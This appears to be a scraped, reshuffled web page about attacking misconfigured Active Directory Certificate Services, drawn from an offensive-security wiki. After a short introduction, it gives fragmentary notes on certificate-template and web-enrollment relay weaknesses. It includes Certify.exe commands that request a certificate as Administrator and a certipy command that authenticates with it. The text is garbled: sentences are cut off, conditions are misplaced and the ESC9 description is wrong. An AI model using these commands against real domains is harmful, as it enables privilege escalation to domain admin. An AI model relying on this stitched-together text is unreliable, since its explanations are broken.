Hacktricks Adcs Repack May 2026

Introduction Active Directory Certificate Services (ADCS) is Microsoft’s PKI (Public Key Infrastructure) implementation. When integrated with Active Directory, ADCS enables certificate-based authentication, smart card logons, and encryption. However, misconfigurations in ADCS are notoriously common and can lead to domain compromise, privilege escalation, and persistence.

: Obtain a certificate for the relayed account (e.g., a computer account, domain admin). ESC9 – No Security Extension in Template Condition : Certificate template has CT_FLAG_NO_SECURITY_EXTENSION , which bypasses permissions on the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT . hacktricks adcs

Certify.exe request /ca:DC.CONTOSO.LOCAL\CONTOSO-CA /template:User /altname:Administrator Condition : ADCS web enrollment interfaces ( /certsrv/ , /CertSrv/ , /certsrv/mscep/ ) are enabled and not configured with extended protection or HTTPS. : Obtain a certificate for the relayed account (e

(using ntlmrelayx.py from Impacket):

: Request any template with Client Authentication EKU and include SAN. (using ntlmrelayx

# Request a certificate for a domain admin (using Certify) Certify.exe request /ca:dc.contoso.local\CONTOSO-CA /template:UserSAN /altname:Administrator certipy auth -pfx administrator.pfx -domain contoso.local